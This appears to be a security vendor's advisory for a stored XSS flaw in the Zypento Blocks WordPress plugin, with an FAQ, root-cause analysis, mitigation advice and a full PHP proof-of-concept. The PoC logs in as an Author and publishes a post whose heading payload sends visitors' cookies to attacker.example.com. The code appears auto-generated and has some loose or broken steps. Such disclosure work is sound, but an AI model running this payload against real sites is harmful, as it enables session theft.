What is CVE-2026-5820?

CVE-2026-5820 is a Stored Cross-Site Scripting (XSS) vulnerability in the Zypento Blocks plugin for WordPress. It affects versions up to and including 1.0.6 and allows authenticated users with Author-level access to inject arbitrary JavaScript into pages via the Table of Contents block.

How does the vulnerability work?

The vulnerability occurs because the Table of Contents block uses `innerHTML` to insert heading text into the page without proper sanitization. An attacker can create a post with a malicious heading containing a script, which will execute when users view the page.

Who is affected by this vulnerability?

WordPress sites using the Zypento Blocks plugin version 1.0.6 or earlier are affected. Specifically, authenticated users with Author-level permissions or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Zypento Blocks plugin installed. If it is version 1.0.6 or earlier, your site is at risk. Additionally, review any posts created by users with Author-level access for potentially malicious headings.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-5820 is 6.4, indicating a medium severity vulnerability. This score reflects the potential impact and exploitability of the vulnerability, suggesting that while it requires authenticated access, it poses a significant risk to user data.

How can I mitigate the risk of this vulnerability?

To mitigate this vulnerability, you should disable the Table of Contents block in the Zypento Blocks plugin or consider using alternative plugins until a patch is released. Regularly check for updates from the plugin developers.

What should I do if I have already been exploited?

If you suspect exploitation, immediately review your posts for malicious content and remove any harmful headings. Change passwords for all user accounts with Author-level access and consider auditing your site for further security issues.

How does the proof of concept demonstrate the issue?

The proof of concept provided simulates an attack by creating a post with a malicious heading that contains a script. It demonstrates how an attacker with valid Author credentials can exploit the vulnerability to execute JavaScript when the page is viewed.

What are the practical risks of this vulnerability?

The practical risks include session hijacking, redirection to malicious sites, and the ability to manipulate user experiences on the site. Since the XSS is stored, every visitor to the affected page could be compromised.

Is there a patch available for this vulnerability?

As of now, there is no patched version of the Zypento Blocks plugin available. Users are advised to disable the affected functionality until a fix is released by the developers.

What is Stored XSS and how does it differ from other types?

Stored XSS occurs when an attacker injects a script into a web application, which is then stored on the server and executed when users access the affected page. This differs from reflected XSS, where the attack is executed immediately without being stored.

What are the implications of the CWE-79 classification?

CWE-79, which refers to Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’), indicates that the vulnerability is related to inadequate handling of user input in web applications, leading to potential script execution in users’ browsers.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 24, 2026

CVE-2026-5820: Zypento Blocks <= 1.0.6 – Authenticated (Author+) Stored Cross-Site Scripting via Table of Contents Block (zypento-blocks)

CVE ID CVE-2026-5820

Plugin zypento-blocks

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.06

Patched Version —

Disclosed April 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5820 (metadata-based): This vulnerability is a Stored Cross-Site Scripting (XSS) within the Zypento Blocks plugin for WordPress, affecting the Table of Contents (TOC) block up to version 1.0.6. An attacker with Author-level permissions or higher can inject arbitrary web scripts that execute when a user visits a page containing the malicious TOC block. The CVSS score is 6.4, indicating medium severity with network access, low complexity, and requiring low privileges.

The root cause, inferred from the CWE-79 classification and the vulnerability description, lies in the insecure use of JavaScript to generate the Table of Contents. The front-end script reads heading text using `innerText` (which is safe) but then inserts it into the DOM using `innerHTML` without any sanitization. This is a classic DOM-based XSS pattern where the plugin takes data from the page (heading text) and insecurely writes it back into the page. Since an Author can create posts with arbitrary heading text, they can craft a heading containing an XSS payload.

The Zypento Blocks TOC block must be placed on the same page. When the page renders, the TOC block’s script iterates over headings on the page, reads their `innerText`, and then uses `innerHTML` to build the TOC list. Because `innerHTML` is used without escaping, the malicious heading’s text is rendered as HTML, executing the injected script. No specific AJAX endpoint or REST API is involved; the attack is purely client-side after the page is rendered, but it is stored because the malicious heading is persisted in the database.

Remediation requires the plugin developers to change the TOC generation script to use `innerText` instead of `innerHTML` when setting the content of the TOC items. Alternatively, they should sanitize or escape the heading text using `textContent` or a safe DOM manipulation method like `document.createTextNode()`. A transient fix would be to escape HTML entities in the heading text before insertion. The most secure fix is to avoid using `innerHTML` for any data that originates from user input or the page content. Since no patched version is available, users must temporarily disable the Table of Contents block or use alternative plugins until a fix is released.

If exploited, an attacker can inject arbitrary JavaScript that executes in the context of the victim’s browser. This can lead to session hijacking (via cookie theft), redirection to malicious sites, defacement of the WordPress site, or execution of WordPress API actions on behalf of the victim. Since the XSS is stored, every visitor to the affected page is compromised. The impact is limited to data and integrity loss (CVSS: C:L/I:L/A:N), meaning the attacker cannot directly take over the server but can manipulate the user’s experience and steal sensitive data.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5820 - Zypento Blocks <= 1.0.6 - Authenticated (Author+) Stored Cross-Site Scripting via Table of Contents Block

// Note: This PoC assumes the attacker has valid WordPress credentials with Author-level access.
// The vulnerability is client-side, so we simulate the stored XSS by creating a post with a malicious heading.
// The Zypento Blocks TOC block must be active on the target site and placed on the page.

$target_url = 'http://example.com';  // Change this to the target WordPress site URL
$username = 'author_user';           // Change to a valid Author username
$password = 'author_password';       // Change to the password

// Step 1: Authenticate and get a WordPress nonce for post creation
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies_cve_2026_5820.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if (curl_error($ch)) {
    die('Login failed: ' . curl_error($ch) . "n");
}
curl_close($ch);

// Check for login cookie (WordPress sets 'wordpress_logged_in_' cookie)
$cookies = file_get_contents('/tmp/cookies_cve_2026_5820.txt');
if (strpos($cookies, 'wordpress_logged_in') === false) {
    die('Authentication failed. Check credentials.n');
}
echo "[+] Authenticated successfully.n";

// Step 2: Obtain admin-ajax nonce (required for creating posts via AJAX)
$admin_url = $target_url . '/wp-admin/admin-ajax.php';
$nonce_action = 'zypento_blocks_nonce';  // Inferred from plugin slug; may need adjustment

// We assume an AJAX endpoint exists to create posts; however, the standard way is via REST API.
// Let's use the WordPress REST API which is more reliable for post creation.

$rest_url = $target_url . '/wp-json/wp/v2/posts';
$nonce_url = $target_url . '/wp-admin/admin-ajax.php?action=wp_rest_nonce'; // Not standard, we'll get nonce from page

// Alternative: Get nonce from the post editor page
$editor_url = $target_url . '/wp-admin/post-new.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $editor_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies_cve_2026_5820.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

// Extract the REST API nonce (wp_rest)
preg_match('/"rest_nonce":"([^"]+)"/', $response, $matches);
if (!isset($matches[1])) {
    die('Could not extract REST nonce.n');
}
$rest_nonce = $matches[1];
echo "[+] Obtained REST nonce: $rest_noncen";

// Step 3: Craft the malicious post with a heading that contains XSS payload
$payload = '</h2><img src=x onerror=fetch("https://attacker.example.com/steal?cookie="+document.cookie)><h2>';
$post_content = '<!-- wp:paragraph --><h2 id="target-heading">' . $payload . '</h2><!-- /wp:paragraph --><!-- wp:zypento-blocks/table-of-contents /-->';

$post_data = array(
    'title' => 'Test Post - Atomic Edge PoC',
    'content' => $post_content,
    'status' => 'publish',
    'author' => 1  // Author ID (adjust if needed)
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $rest_nonce
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies_cve_2026_5820.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 201) {
    $response_data = json_decode($response, true);
    $post_id = $response_data['id'];
    $post_link = $response_data['link'];
    echo "[+] Post created successfully.n";
    echo "[+] Post ID: $post_idn";
    echo "[+] Visit the post to trigger XSS: $post_linkn";
    echo "[+] The payload will execute when the Table of Contents block is rendered.n";
} else {
    echo "[-] Failed to create post. HTTP code: $http_coden";
    echo "Response: $responsen";
}

// Clean up cookie file
unlink('/tmp/cookies_cve_2026_5820.txt');
?>

Frequently Asked Questions

What is CVE-2026-5820?
Overview of the vulnerability
CVE-2026-5820 is a Stored Cross-Site Scripting (XSS) vulnerability in the Zypento Blocks plugin for WordPress. It affects versions up to and including 1.0.6 and allows authenticated users with Author-level access to inject arbitrary JavaScript into pages via the Table of Contents block.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs because the Table of Contents block uses `innerHTML` to insert heading text into the page without proper sanitization. An attacker can create a post with a malicious heading containing a script, which will execute when users view the page.
Who is affected by this vulnerability?
Identifying vulnerable users
WordPress sites using the Zypento Blocks plugin version 1.0.6 or earlier are affected. Specifically, authenticated users with Author-level permissions or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the Zypento Blocks plugin installed. If it is version 1.0.6 or earlier, your site is at risk. Additionally, review any posts created by users with Author-level access for potentially malicious headings.
What is the CVSS score and what does it mean?
Understanding severity levels
The CVSS score for CVE-2026-5820 is 6.4, indicating a medium severity vulnerability. This score reflects the potential impact and exploitability of the vulnerability, suggesting that while it requires authenticated access, it poses a significant risk to user data.
How can I mitigate the risk of this vulnerability?
Recommended actions
To mitigate this vulnerability, you should disable the Table of Contents block in the Zypento Blocks plugin or consider using alternative plugins until a patch is released. Regularly check for updates from the plugin developers.
What should I do if I have already been exploited?
Response to exploitation
If you suspect exploitation, immediately review your posts for malicious content and remove any harmful headings. Change passwords for all user accounts with Author-level access and consider auditing your site for further security issues.
How does the proof of concept demonstrate the issue?
Understanding the PoC
The proof of concept provided simulates an attack by creating a post with a malicious heading that contains a script. It demonstrates how an attacker with valid Author credentials can exploit the vulnerability to execute JavaScript when the page is viewed.
What are the practical risks of this vulnerability?
Potential consequences
The practical risks include session hijacking, redirection to malicious sites, and the ability to manipulate user experiences on the site. Since the XSS is stored, every visitor to the affected page could be compromised.
Is there a patch available for this vulnerability?
Current status of remediation
As of now, there is no patched version of the Zypento Blocks plugin available. Users are advised to disable the affected functionality until a fix is released by the developers.
What is Stored XSS and how does it differ from other types?
Explaining Stored XSS
Stored XSS occurs when an attacker injects a script into a web application, which is then stored on the server and executed when users access the affected page. This differs from reflected XSS, where the attack is executed immediately without being stored.
What are the implications of the CWE-79 classification?
Understanding the classification
CWE-79, which refers to Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’), indicates that the vulnerability is related to inadequate handling of user input in web applications, leading to potential script execution in users’ browsers.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations